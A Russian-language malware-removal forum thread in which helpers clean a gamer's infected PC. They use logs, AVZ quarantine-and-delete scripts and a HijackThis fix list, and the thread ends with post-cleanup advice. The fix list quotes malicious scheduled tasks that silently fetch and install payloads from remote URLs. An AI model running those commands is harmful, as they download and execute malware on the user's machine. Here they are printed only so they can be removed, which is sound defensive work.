Решена Вирус-лаггер

Статус
В этой теме нельзя размещать новые ответы.

AndrewBerkut

Новый пользователь
Сообщения
8
Реакции
1
Вчера играл я в GTA 5, Неожиданно для меня Fps упал с 80 до 10. И подниматься не собирался. Выключил комп, пошёл спать.
Сегодня наблюдаю данная проблема не решилась сама собой, подумал вирус.. Зашел на сайт одного антивируса, браузер завис. Диспетчер не открывается, демонстрируя данное сообщение "Точка входа в imagelist_cocreateinstance не найдена в библиотеке dll С/windows/system32/taskmgr.exe". Перезапустил ПК, зашёл на другой сайт с антивирусом, проблема та же.
Что делать? как бороться?
Можно ли самому найти корень сей проблемы?
Так-же браузеры самопроизвольно открывают сайты, в планировщике ничего по этому поводу нету..
1. При любой попытке взаимодействия с антивирусами ПК зависает.
2. Нету возможности открыть AVZ и тд.
3. Не открывается сам диспетчер задач "Точка входа в imagelist_cocreateinstance не найдена в библиотеке dll С/windows/system32/taskmgr.exe" (раньше такого не было)
4. Даже если скачать антивирус с зеркала, вытащить из запароленного архива, Вирус намертво его вешает, и не даёт закрыть.
 
Насколько я понимаю логи собрать не удалось?
 
Не тот лог. Нужен архив CollectionLog из папки с автологером
 
Вы собрали логи устаревшей версией. Удалите Autologger и созданную им папку вместе с содержимым. Скачайте актуальную версию и повторите CollectionLog.
 

Вложения

  • CollectionLog-2018.09.13-16.53.zip
    68.6 KB · Просмотры: 2
  • Like
Реакции: akok
Закройте все программы, временно выгрузите антивирус, файрволл и прочее защитное ПО.

Выполните скрипт в АВЗ (Файл - Выполнить скрипт):
Код:
  begin
ExecuteFile('net.exe', 'stop tcpip /y', 0, 15000, true);
if not IsWOW64
 then
  begin
  SearchRootkit(true, true);
  SetAVZGuardStatus(True);
  end;
QuarantineFile('C:\WINDOWS\SysWOW64\ALyExEIiWaem.exe','');
 QuarantineFile('C:\Program Files (x86)\uAAWYYw.exe','');
 QuarantineFile('C:\ProgramData\MTA San Andreas All\Common\temp\FairplayKD.sys','');
 DeleteFile('C:\Program Files (x86)\uAAWYYw.exe','32');
 DeleteFile('C:\WINDOWS\SysWOW64\ALyExEIiWaem.exe','32');
 ExecuteFile('schtasks.exe', '/delete /TN "{0396377A-39F2-972B-347D-A9C1D1314198}" /F', 0, 15000, true);
  ExecuteFile('schtasks.exe', '/delete /TN "{9E8E9A2B-4FBF-815E-4E7E-22DC3C898DE7}" /F', 0, 15000, true);
  ExecuteFile('schtasks.exe', '/delete /TN "{54E42CD5-4F41-F990-1D97-0881EB29C44B}" /F', 0, 15000, true);
   BC_Activate;
  ExecuteSysClean;
  ExecuteWizard('SCU', 2, 3, true);
 BC_ImportALL;
RebootWindows(true);
end.
Компьютер перезагрузится.

После перезагрузки, выполните такой скрипт:

Код:
begin
DeleteFile(GetAVZDirectory+'quarantine.7z');
ExecuteFile(GetAVZDirectory+'7za.exe', 'a -mx9 -pmalware quarantine ./Quarantine/', 1, 0, true);
end.

Файл quarantine.zip из папки с распакованной утилитой AVZ отправьте с помощью этой формы или (если размер архива превышает 10 MB) на этот почтовый ящик: quarantine <at> safezone.cc (замените <at> на @) с указанием ссылки на тему в теме (заголовке) сообщения и с указанием пароля: virus в теле письма.

"Пофиксите" в HijackThis (некоторые строки могут отсутствовать):
Код:
O22 - Task: {0396377A-39F2-972B-347D-A9C1D1314198} - C:\Program Files (x86)\uAAWYYw.exe /q /i http://wordsexpired.info/s879edtvs1yc.mgu
O22 - Task: {54E42CD5-4F41-F990-1D97-0881EB29C44B} - C:\Program Files (x86)\Google\Chrome\Application\chrome.exe http://nwcnewsforuk.com/cl/?guid=32c4yf0b6uiwdrdyi4lj432g2pwjuw1n&prid=1&pid=5_1301_35124
O22 - Task: {9E8E9A2B-4FBF-815E-4E7E-22DC3C898DE7} - C:\WINDOWS\SysWOW64\ALyExEIiWaem.exe /q /i http://wordsexpired.info/utsjefxuuhti.yih

Для повторной диагностики запустите снова AutoLogger. В первом диалоговом окне нажмите "ОК", удерживая нажатой клавишу "Shift".
 
Попробуйте запускать в обычном режиме после выполнения скрипта.
 
Закройте все программы, временно выгрузите антивирус, файрволл и прочее защитное ПО.

Выполните скрипт в АВЗ (Файл - Выполнить скрипт):
Код:
  begin
ExecuteFile('net.exe', 'stop tcpip /y', 0, 15000, true);
if not IsWOW64
then
  begin
  SearchRootkit(true, true);
  SetAVZGuardStatus(True);
  end;
QuarantineFile('C:\WINDOWS\SysWOW64\ALyExEIiWaem.exe','');
QuarantineFile('C:\Program Files (x86)\uAAWYYw.exe','');
QuarantineFile('C:\ProgramData\MTA San Andreas All\Common\temp\FairplayKD.sys','');
DeleteFile('C:\Program Files (x86)\uAAWYYw.exe','32');
DeleteFile('C:\WINDOWS\SysWOW64\ALyExEIiWaem.exe','32');
ExecuteFile('schtasks.exe', '/delete /TN "{0396377A-39F2-972B-347D-A9C1D1314198}" /F', 0, 15000, true);
  ExecuteFile('schtasks.exe', '/delete /TN "{9E8E9A2B-4FBF-815E-4E7E-22DC3C898DE7}" /F', 0, 15000, true);
  ExecuteFile('schtasks.exe', '/delete /TN "{54E42CD5-4F41-F990-1D97-0881EB29C44B}" /F', 0, 15000, true);
   BC_Activate;
  ExecuteSysClean;
  ExecuteWizard('SCU', 2, 3, true);
BC_ImportALL;
RebootWindows(true);
end.
Компьютер перезагрузится.

После перезагрузки, выполните такой скрипт:

Код:
begin
DeleteFile(GetAVZDirectory+'quarantine.7z');
ExecuteFile(GetAVZDirectory+'7za.exe', 'a -mx9 -pmalware quarantine ./Quarantine/', 1, 0, true);
end.

Файл quarantine.zip из папки с распакованной утилитой AVZ отправьте с помощью этой формы или (если размер архива превышает 10 MB) на этот почтовый ящик: quarantine <at> safezone.cc (замените <at> на @) с указанием ссылки на тему в теме (заголовке) сообщения и с указанием пароля: virus в теле письма.

"Пофиксите" в HijackThis (некоторые строки могут отсутствовать):
Код:
O22 - Task: {0396377A-39F2-972B-347D-A9C1D1314198} - C:\Program Files (x86)\uAAWYYw.exe /q /i http://wordsexpired.info/s879edtvs1yc.mgu
O22 - Task: {54E42CD5-4F41-F990-1D97-0881EB29C44B} - C:\Program Files (x86)\Google\Chrome\Application\chrome.exe http://nwcnewsforuk.com/cl/?guid=32c4yf0b6uiwdrdyi4lj432g2pwjuw1n&prid=1&pid=5_1301_35124
O22 - Task: {9E8E9A2B-4FBF-815E-4E7E-22DC3C898DE7} - C:\WINDOWS\SysWOW64\ALyExEIiWaem.exe /q /i http://wordsexpired.info/utsjefxuuhti.yih

Для повторной диагностики запустите снова AutoLogger. В первом диалоговом окне нажмите "ОК", удерживая нажатой клавишу "Shift".
Всё сделал по инструкции, все проблемы сразу решились:)
Огромное спасибо вашей команде, процветания форуму :)
 
Хорошо. Тогда финальные рекомендации:

Подготовьте лог SecurityCheck by glax24

Ознакомьтесь: Рекомендации после лечения

Пополните, пожалуйста, базу безопасных файлов антивирусной утилиты AVZ:
  1. Запустите AVZ.
  2. Выполните обновление баз (Меню Файл - Обновление баз)
  3. Закройте все приложения, и запустите используемый в Вашей системе интернет-браузер (например Internet Explorer, FireFox, Opera и т.д. - если применяется несколько браузеров, то необходимо запустить их все для того чтобы AVZ смог проанализировать используемые браузерами модули расширения и плагины)
  4. В AVZ выберите пункт меню Файл - Стандартные скрипты. В открывшемся окне необходимо отметить скрипт №8 ("VirusInfo.Info: Скрипт сбора файлов для экспресс-анализа ПК") и нажать кнопку "Выполнить отмеченные скрипты". Выполнение скрипта займет некоторое время, порядка 1 - 5 мин. В результате в папке AVZ будет создан подкаталог LOG, в нем архив с именем virusinfo_files_<имя_ПК>.zip
  5. Закачайте полученный архив, как описано на этой странице.
  6. Если размер архива превышает 250 Мб закачайте его на любой файлообменник, не требующий ввода капчи (например: RGhost, Zippyshare, My-Files.RU, karelia.ru, Ge.tt или WebFile) и укажите ссылку на скачивание в своём следующем сообщении.
 
Хорошо. Тогда финальные рекомендации:

Подготовьте лог SecurityCheck by glax24

Ознакомьтесь: Рекомендации после лечения

Пополните, пожалуйста, базу безопасных файлов антивирусной утилиты AVZ:
  1. Запустите AVZ.
  2. Выполните обновление баз (Меню Файл - Обновление баз)
  3. Закройте все приложения, и запустите используемый в Вашей системе интернет-браузер (например Internet Explorer, FireFox, Opera и т.д. - если применяется несколько браузеров, то необходимо запустить их все для того чтобы AVZ смог проанализировать используемые браузерами модули расширения и плагины)
  4. В AVZ выберите пункт меню Файл - Стандартные скрипты. В открывшемся окне необходимо отметить скрипт №8 ("VirusInfo.Info: Скрипт сбора файлов для экспресс-анализа ПК") и нажать кнопку "Выполнить отмеченные скрипты". Выполнение скрипта займет некоторое время, порядка 1 - 5 мин. В результате в папке AVZ будет создан подкаталог LOG, в нем архив с именем virusinfo_files_<имя_ПК>.zip
  5. Закачайте полученный архив, как описано на этой странице.
  6. Если размер архива превышает 250 Мб закачайте его на любой файлообменник, не требующий ввода капчи (например: RGhost, Zippyshare, My-Files.RU, karelia.ru, Ge.tt или WebFile) и укажите ссылку на скачивание в своём следующем сообщении.
Cделано :)
 
А лог где? :)
 
------------------------------- [ Windows ] -------------------------------
Internet Explorer 11.228.17134.0 Внимание! Скачать обновления
^Онлайн установка. Последняя версия доступна при включенном обновлении Windows через интернет.^
--------------------------- [ OtherUtilities ] ----------------------------
7-Zip 17.01 beta (x64) v.17.01 beta Внимание! Скачать обновления
^Удалите старую версию, скачайте и установите новую.^
VLC media player v.2.2.8 Внимание! Скачать обновления
WinRAR 5.50 v.5.50 Внимание! Скачать обновления
TeamViewer 13 v.13.2.5287 Внимание! Скачать обновления
--------------------------------- [ P2P ] ---------------------------------
µTorrent v.3.5.3.44494 Внимание! Клиент сети P2P! Может содержать рекламные модули или использоваться для скачивания нежелательного контента.
-------------------------------- [ Java ] ---------------------------------
Java 8 Update 161 (64-bit) v.8.0.1610.12 Внимание! Скачать обновления
^Удалите старую версию и установите новую (jre-8u181-windows-x64.exe)^
--------------------------- [ AppleProduction ] ---------------------------
QuickTime 7 v.7.79.80.95 Данная программа больше не поддерживается разработчиком и имеет известные проблемы безопасности! Рекомендуется деинсталлировать данное ПО.
--------------------------- [ AdobeProduction ] ---------------------------
Adobe Reader XI (11.0.22) - Russian v.11.0.22 Данная программа больше не поддерживается разработчиком. Рекомендуется деинсталлировать ее, скачать и установить Adobe Acrobat Reader DC.
------------------------------- [ Browser ] -------------------------------
Mozilla Firefox 58.0.2 (x64 ru) v.58.0.2 Внимание! Скачать обновления
^Проверьте обновления через меню Справка - О Firefox!^
Google Chrome v.68.0.3440.106 Внимание! Скачать обновления
^Проверьте обновления через меню Справка - О Google Chrome!^
---------------------------- [ UnwantedApps ] -----------------------------
Unity Web Player v.5.3.5f1 Внимание! Приложение распространяется в рамках партнерских программ и сборников-бандлов. Рекомендуется деинсталляция. Возможно Вы стали жертвой обмана или социальной инженерии.
Кнопка "Яндекс" на панели задач v.2.0.1.2170 Внимание! Приложение распространяется в рамках партнерских программ и сборников-бандлов. Рекомендуется деинсталляция. Возможно Вы стали жертвой обмана или социальной инженерии.
VKMusic 4 v.4.77.1 Внимание! Панель для браузера. Может замедлять работу браузера и иметь проблемы с нарушением конфиденциальности.
 
Статус
В этой теме нельзя размещать новые ответы.
Назад
Сверху Снизу